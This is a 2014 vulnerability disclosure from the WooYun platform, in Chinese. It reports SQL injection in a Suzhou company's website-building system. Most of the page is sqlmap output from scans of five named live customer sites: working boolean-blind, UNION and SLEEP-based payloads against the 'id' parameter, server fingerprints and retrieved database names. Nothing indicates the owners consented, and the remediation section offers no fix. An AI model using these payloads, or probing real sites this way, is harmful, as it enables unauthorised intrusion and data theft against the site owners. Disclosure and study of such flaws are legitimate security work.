当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063436

漏洞标题:某建站系统多处sql注入(从官网随机选的几个案例进行注入)

相关厂商:苏州托普斯网络科技有限公司

漏洞作者: Mosuan

提交时间:2014-06-04 11:55

修复时间:2014-09-02 11:56

公开时间:2014-09-02 11:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

女神是什么?

详细说明:

求上首页啊!
某建站系统的首页

http://www.topsi.net.cn/


随机选了几个案例进行sql注入

注入地址:http://www.slin-gift.com/news_show.php?id=32
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:24:16
[00:24:16] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.slin-gift.com\session' as session file
[00:24:16] [INFO] testing connection to the target url
[00:24:17] [INFO] testing if the url is stable, wait a few seconds
[00:24:18] [INFO] url is stable
[00:24:18] [INFO] testing if GET parameter 'id' is dynamic
[00:24:18] [INFO] confirming that GET parameter 'id' is dynamic
[00:24:18] [INFO] GET parameter 'id' is dynamic
[00:24:18] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[00:24:18] [INFO] testing sql injection on GET parameter 'id'
[00:24:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:24:20] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[00:24:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:24:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:24:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:24:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[00:24:21] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:24:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:24:22] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:24:32] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable
[00:24:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:24:32] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[00:24:34] [INFO] target url appears to have 7 columns in query
[00:24:37] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 34 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32' AND 4679=4679 AND 'bzvD'='bzvD
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-7959' UNION SELECT NULL, CONCAT(0x3a7675673a,0x6b7a647a63724b64
6751,0x3a6a64623a), NULL, NULL, NULL, NULL, NULL# AND 'hgJK'='hgJK
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=32' AND SLEEP(5) AND 'ffLc'='ffLc
---
[00:25:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15, PHP 5.3.15
back-end DBMS: MySQL 5.0.11
[00:25:37] [INFO] fetching database names
[00:25:37] [INFO] the SQL query used returns 2 entries
[00:25:37] [INFO] retrieved: "information_schema"
[00:25:38] [INFO] retrieved: "lipin0820"
available databases [2]:
[*] information_schema
[*] lipin0820
[00:25:38] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.slin-gift.com'
[*] shutting down at 00:25:38


注入地址:http://www.szseusp.com/news_show.php?id=32
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:23:15
[00:23:15] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.szseusp.com\session' as session file
[00:23:15] [INFO] testing connection to the target url
[00:23:16] [INFO] testing if the url is stable, wait a few seconds
[00:23:17] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[00:23:19] [INFO] testing if GET parameter 'id' is dynamic
[00:23:19] [INFO] confirming that GET parameter 'id' is dynamic
[00:23:20] [INFO] GET parameter 'id' is dynamic
[00:23:20] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: MySQL)
[00:23:20] [INFO] testing sql injection on GET parameter 'id'
[00:23:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:23:25] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[00:23:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:23:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:23:45] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable
[00:23:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:23:46] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[00:23:50] [INFO] target url appears to have 12 columns in query
[00:24:03] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 38 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32' AND 1374=1374 AND 'GNjT'='GNjT
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: id=-4594' UNION SELECT NULL, NULL, CONCAT(0x3a6876643a,0x6f66436d50
754f61596a,0x3a6d72733a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
AND 'KYON'='KYON
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=32' AND SLEEP(5) AND 'SAJD'='SAJD
---
[00:24:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15, PHP 5.3.15
back-end DBMS: MySQL 5.0.11
[00:24:08] [INFO] fetching database names
[00:24:08] [INFO] the SQL query used returns 2 entries
[00:24:08] [INFO] retrieved: "information_schema"
[00:24:09] [INFO] retrieved: "dongn0713"
available databases [2]:
[*] dongn0713
[*] information_schema
[00:24:09] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.szseusp.com'
[*] shutting down at 00:24:09


注入地址:http://www.szraken.com/news_show.php?id=32
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:21:48
[00:21:48] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.szraken.com\session' as session file
[00:21:48] [INFO] testing connection to the target url
[00:21:49] [INFO] testing if the url is stable, wait a few seconds
[00:21:54] [INFO] url is stable
[00:21:54] [INFO] testing if GET parameter 'id' is dynamic
[00:21:55] [INFO] confirming that GET parameter 'id' is dynamic
[00:21:56] [INFO] GET parameter 'id' is dynamic
[00:21:57] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: SQLite)
[00:21:57] [INFO] testing sql injection on GET parameter 'id'
[00:21:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:22:10] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
parsed error message(s) showed that the back-end DBMS could be SQLite. Do you wa
nt to skip test payloads specific for other DBMSes? [Y/n] y
[00:23:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:23:07] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[00:23:09] [INFO] target url appears to have 16 columns in query
[00:23:14] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[00:23:14] [INFO] checking if the injection point on GET parameter 'id' is a fal
se positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 53 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32' AND 4187=4187 AND 'CgKW'='CgKW
---
[00:23:22] [INFO] testing SQLite
[00:23:22] [INFO] confirming SQLite
[00:23:22] [INFO] actively fingerprinting SQLite
[00:23:22] [INFO] the back-end DBMS is SQLite
web server operating system: Linux CentOS
web application technology: Apache 2.2.15, PHP 5.3.15
back-end DBMS: SQLite
[00:23:22] [WARNING] on SQLite it is not possible to enumerate databases
[00:23:22] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.szraken.com'
[*] shutting down at 00:23:22


注入地址:http://www.suzhouhuanbao.com/news_show.php?id=32
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:18:33
[00:18:33] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.suzhouhuanbao.com\session' as session file
[00:18:33] [INFO] testing connection to the target url
[00:18:34] [INFO] testing if the url is stable, wait a few seconds
[00:18:36] [INFO] url is stable
[00:18:36] [INFO] testing if GET parameter 'id' is dynamic
[00:18:37] [WARNING] GET parameter 'id' appears to be not dynamic
[00:18:37] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: MySQL)
[00:18:37] [INFO] testing sql injection on GET parameter 'id'
[00:18:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:19:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:19:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:19:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan
t to skip test payloads specific for other DBMSes? [Y/n] y
[00:19:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:20:06] [INFO] target url appears to be UNION injectable with 9 columns
[00:20:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 81 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: id=-8311' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NU
LL, CONCAT(0x3a7466753a,0x4f4d764a6d5950486b58,0x3a716d7a3a)# AND 'SrPz'='SrPz
---
[00:20:22] [INFO] testing MySQL
[00:20:22] [INFO] confirming MySQL
[00:20:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15, PHP 5.3.15
back-end DBMS: MySQL >= 5.0.0
[00:20:22] [INFO] fetching database names
[00:20:22] [INFO] the SQL query used returns 2 entries
[00:20:23] [INFO] retrieved: "information_schema"
[00:20:23] [INFO] retrieved: "huanb1230"
available databases [2]:
[*] huanb1230
[*] information_schema
[00:20:23] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.suzhouhuanbao.com'
[*] shutting down at 00:20:23


注入地址:http://www.nxparm.com/news_show.php?id=32
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 00:20:29
[00:20:29] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.nxparm.com\session' as session file
[00:20:29] [INFO] testing connection to the target url
[00:20:29] [INFO] testing if the url is stable, wait a few seconds
[00:20:31] [INFO] url is stable
[00:20:31] [INFO] testing if GET parameter 'id' is dynamic
[00:20:31] [INFO] confirming that GET parameter 'id' is dynamic
[00:20:34] [INFO] GET parameter 'id' is dynamic
[00:20:34] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: MySQL)
[00:20:34] [INFO] testing sql injection on GET parameter 'id'
[00:20:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:20:35] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[00:20:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:20:35] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:20:35] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan
t to skip test payloads specific for other DBMSes? [Y/n] y
[00:20:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:20:46] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[00:20:46] [INFO] target url appears to have 22 columns in query
[00:20:50] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 61 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32' AND 3408=3408 AND 'eiUP'='eiUP
Type: UNION query
Title: MySQL UNION query (NULL) - 22 columns
Payload: id=-7279' UNION SELECT NULL, CONCAT(0x3a7864733a,0x426f7a5473665458
6174,0x3a766a723a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'XqUl'='XqUl
---
[00:20:52] [INFO] testing MySQL
[00:20:52] [INFO] confirming MySQL
[00:20:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15, PHP 5.3.15
back-end DBMS: MySQL >= 5.0.0
[00:20:52] [INFO] fetching database names
[00:20:52] [INFO] the SQL query used returns 2 entries
[00:20:53] [INFO] retrieved: "information_schema"
[00:20:53] [INFO] retrieved: "dings0504"
available databases [2]:
[*] dings0504
[*] information_schema
[00:20:53] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.nxparm.com'

漏洞证明:

详细说明,前面的漏洞求审核啊!!!

修复方案:

你们懂的!

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝